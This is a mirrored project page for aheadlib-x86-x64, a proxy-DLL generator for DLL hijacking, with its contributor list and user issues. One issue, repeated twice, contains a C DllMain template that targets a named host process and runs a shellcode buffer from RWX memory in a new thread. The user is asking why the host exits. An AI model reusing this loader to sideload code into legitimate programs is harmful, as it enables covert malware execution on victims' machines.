Code Monkey home page Code Monkey logo

aheadlib-x86-x64's Introduction

Hi there 👋

  • 🔭 二进制攻防、逆向、恶意代码分析
  • ⚡ 安全产品研发,红队武器库研发
  • 🌱 深耕终端安全和数据安全领域
  • 💬 qqmail: 79884260###qq.com @ 替换 ###

aheadlib-x86-x64's People

Contributors

hookdll avatar strivexjun avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

zenixyang skyformat99 idone nofox badboy3000 a-new johnwins killvxk explife0011 blacktrace cryzlasm kungia09 barry-ran sylingyy godminer baby-233 zbx91 mycyty uvbs lfyg hymeca wgwjifeng xiaoccao tongmiaocai sun221 w7oami anhkggfork disk-kk glace boogie77 honshow qing666888 wxjwz haidragon wandec kuniao partrick csky6688 yang-zhiyuan prsood 309746069 cr3m leonluffy assqingt dearfuture nsxz shiweiren eminsight tutttta brucelee1940 chased9166 2217936322 waterman178 fengjixuchui asked637 zh4x zanzo420 i-liberty eipp4ssenger codingman awen162 simple555a radtek ls306056885 lvtx darkersquirrel asdlei99 quinn-yan gogogosco sjhgithub fakeuser7 krystianli opensesamedoors xiaolei0924 cool2528 zaza6677 yeshuibo jialingchen1201 eniac888 raystyle aaronnew dukv2001 httese vulcanraven91 sunwm518 c0py7hat woozoo86 xuacker xiaoshzx oldyang1983 httpsgithu chinasmu man008 bb33bb hl0071 floatingnumber kbugstar wbaby fadinglr askyeye

aheadlib-x86-x64's Issues

ntdll x64 错误

.rdata节数据未知! 继续?
ord:1256
func_rva:001193E0
名称:RtlNtdllName

add hook api

`T)_6JQVO}N~DPN0D}}RQDS
希望增加hook api 功能,api 可以自行选择

编译DLL成功,但是运行有问题 DEP的事情

假定我现在导出了ABC函数:

.DATA


EXTERN pfnAheadLib_ABC:dq;
.....

AheadLib_ABC PROC
	jmp pfnAheadLib_ABC
AheadLib_ABC ENDP
....

PVOID pfnAheadLib_ABC;
....

在dllmain里 load init 都没问题,但是EXE调用ABC函数的话,就崩溃了,如果把DLL的data段设置为可读可写可执行权限的话,一切没问题,所以我认为是DEP的事情,于是我在load \init 完毕后,就添加了VirtualProtectEx函数调用,但是返回为false ....
请问怎么搞

自定义shellcode运行完成后 exe就结束了

我在生成的文件添加了 shellcode 后 劫持是成功的 未报任何错误 但是当处理完新建的线程任务后 主程序exe就退出了
我不知道那里出错了 希望能帮忙看一下
代码如下

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
  {
      LPVOID newMemory;
      HANDLE currentProcess;
      SIZE_T bytesWritten;
      BOOL didWeCopy = FALSE;
  
      // Get the current process handle 
      currentProcess = GetCurrentProcess();
  
  
      // Allocate memory with Read+Write+Execute permissions 
      newMemory = VirtualAllocEx(currentProcess, NULL, SHELLCODELEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  
      if (newMemory == NULL)
	      return -1;
  
      // Copy the shellcode into the memory we just created 
      didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&shellcode, SHELLCODELEN, &bytesWritten);
  
      if (!didWeCopy)
	      return -2;
  
  
      // Yay! Let's run our shellcode! 
      ((void(*)())newMemory)();
  
      return 0;
  }


BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
	    DisableThreadLibraryCalls(hModule);

	    if (Load() && Init())
	    {
		    TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");//请修改宿主进程名
		    TCHAR szCurName[MAX_PATH];

		    GetModuleFileName(NULL, szCurName, MAX_PATH);
		    PathStripPath(szCurName);
	    
		    
		    //是否判断宿主进程名
		    if (StrCmpI(szCurName, szAppName) == 0)
		    {
			    //启动补丁线程或者其他操作
			    HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, NULL, NULL);
			    if (hThread)
			    {
				    CloseHandle(hThread);

				    HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
				    CloseHandle(threadHandle);
			    }
			    
		    }
	    }
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
	    Free();
    }

    return TRUE;
}

自定义shellcode运行完成后 exe就结束了

我在生成的文件添加了 shellcode 后 劫持是成功的 未报任何错误 但是当处理完新建的线程任务后 主程序exe就退出了
我不知道那里出错了 希望能帮忙看一下
代码如下

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
  {
      LPVOID newMemory;
      HANDLE currentProcess;
      SIZE_T bytesWritten;
      BOOL didWeCopy = FALSE;
  
      // Get the current process handle 
      currentProcess = GetCurrentProcess();
  
  
      // Allocate memory with Read+Write+Execute permissions 
      newMemory = VirtualAllocEx(currentProcess, NULL, SHELLCODELEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  
      if (newMemory == NULL)
	      return -1;
  
      // Copy the shellcode into the memory we just created 
      didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&shellcode, SHELLCODELEN, &bytesWritten);
  
      if (!didWeCopy)
	      return -2;
  
  
      // Yay! Let's run our shellcode! 
      ((void(*)())newMemory)();
  
      return 0;
  }


BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
	    DisableThreadLibraryCalls(hModule);

	    if (Load() && Init())
	    {
		    TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");//请修改宿主进程名
		    TCHAR szCurName[MAX_PATH];

		    GetModuleFileName(NULL, szCurName, MAX_PATH);
		    PathStripPath(szCurName);
	    
		    
		    //是否判断宿主进程名
		    if (StrCmpI(szCurName, szAppName) == 0)
		    {
			    //启动补丁线程或者其他操作
			    HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, NULL, NULL);
			    if (hThread)
			    {
				    CloseHandle(hThread);

				    HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
				    CloseHandle(threadHandle);
			    }
			    
		    }
	    }
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
	    Free();
    }

    return TRUE;
}

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.